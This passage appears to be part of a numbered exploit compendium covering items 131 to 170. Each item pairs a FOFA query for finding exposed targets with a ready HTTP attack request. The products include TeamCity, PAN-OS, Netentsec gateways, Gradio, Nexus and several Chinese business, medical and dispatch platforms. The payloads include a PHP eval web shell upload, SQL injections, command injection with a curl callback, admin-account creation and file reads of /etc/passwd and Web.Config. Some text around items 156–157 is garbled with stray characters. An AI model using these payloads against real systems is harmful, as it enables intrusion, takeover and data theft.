Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat CORS SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform: weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected versions:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
/ f4 Z# a4 }% l% R: ^- n
" K1 v' s& [4 n" T156. TBK DVR-4104/DVR-4216 操作系统命令注入4 }* c: X8 ?% m" J, R/ P
CVE-2024-3721
8 U4 L( i, l! Q5 W2 X1 h3 c6 WFOFA:"Location: /login.rsp"! F( e0 w! w* s  d. ^% U+ w  k) U( d9 @
·TBK DVR-4104
7 _( }' ?6 f0 @' K$ p, E) a·TBK DVR-4216! y$ O; }$ `  j& V9 L9 \+ Y
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& A+ u  l3 B% C( m, M
) B% j' r4 Q$ ?! L. _! g" `6 ]& P2 _/ ]* D7 ?4 V/ h& j
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- O, Z. Z2 N/ H4 n# {
Host: x.x.x.x6 S8 l7 R  y: Z" l6 r7 _
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ s* N9 D6 l- J; t/ K. |: j
Connection: close
; k# Z* }0 I4 s. I, A7 w! c+ ]Content-Length: 0
# p% M4 F4 g* Q0 t) ~Cookie: uid=1
- g& H% l- h' @4 |7 Y! q7 i: M2 YAccept-Encoding: gzip! \3 r! Y) u1 t0 p
: n1 m( ]+ Y( r8 i

: Y- P8 H( _! Q157. 美特CRM upload.jsp 任意文件上传2 d2 U" J5 G) `) T4 d7 H
CNVD-2023-06971# c% |; G1 B" e( F
FOFA:body="/common/scripts/basic.js"
  \2 Y  d( B1 i1 q0 k# WPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
# v7 c3 p7 z! X1 {Host: x.x.x.x
: d( H% |0 z* F; z7 r) WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36; q- t. |* I5 ~5 t: d, K% R* F+ [( N
Content-Length: 7091 c" n' c! {2 j  Y( [- H% d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 N" ~  j. A1 x- TAccept-Encoding: gzip, deflate
& a9 b, {& M$ B5 j) n6 PAccept-Language: zh-CN,zh;q=0.9; n. o) o) M2 I& f- ~" T
Cache-Control: max-age=0
7 P, \- n! y2 {5 S5 UConnection: close
9 i. I* C- V0 [# v& P& G7 `Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
( b6 K/ Y1 h0 c/ {) |Upgrade-Insecure-Requests: 1
6 H2 ]7 v6 N2 v# |# [6 b9 z. r- [, @* ?, z7 ~: Z; q8 y# {2 r
------WebKitFormBoundary1imovELzPsfzp5dN. L) |4 ?. L: m; a& b% k" F% B
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"! e8 L. I% G4 S/ \* K
Content-Type: application/octet-stream
  d) {* D  J3 x( G7 X5 h6 l3 K# \  R- t1 Y1 R8 x9 T0 M
nyhelxrutzwhrsvsrafb
4 p* X* _5 \& u+ p------WebKitFormBoundary1imovELzPsfzp5dN+ q4 p7 m1 t: |( j' g- M
Content-Disposition: form-data; name="key", E4 y* D; I* G% T9 _2 u' z
  a  O) U; F2 V% a! ]
null
5 H! T2 i+ h6 r7 x, M------WebKitFormBoundary1imovELzPsfzp5dN
5 O) a) o2 e5 Z# |Content-Disposition: form-data; name="form"
/ v  @2 ]! V9 V( P3 b9 f) c9 ]# C9 h2 J; d0 E
null
( p! I- G  B+ ?% w/ l------WebKitFormBoundary1imovELzPsfzp5dN0 Q* v: T  _" I! [: V9 q2 }) O
Content-Disposition: form-data; name="field"7 i) c; K; w# P; B+ d

0 Y1 l: Q# g2 _1 G  s+ p0 Vnull
2 l+ w  H5 C: o------WebKitFormBoundary1imovELzPsfzp5dN/ j& a3 z# v4 ~, L. G' b* |
Content-Disposition: form-data; name="filetitile"
# y+ d6 d; g# k0 e1 h
6 w$ y. i- k8 ~: N& Y5 Dnull
# q  n' s/ w* p5 ]! C+ [------WebKitFormBoundary1imovELzPsfzp5dN
" H8 [9 i8 m2 [# q' X' XContent-Disposition: form-data; name="filefolder"" {, g3 X2 R* c- P

& e+ z4 D9 o) u6 V! b8 l6 ?$ Hnull) @0 `1 M' p4 B& t" [, S
------WebKitFormBoundary1imovELzPsfzp5dN--
( G4 C( G: |9 d. Y) X. P
3 ]. s0 r3 v6 C5 M& A
- }" i0 n1 W$ Q' Q* I) g% a- X' thttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp, n6 K% a1 Y9 j4 D
9 t) h3 r. g% T" A: L/ H" f* Q
158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan (慧校园, also 安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
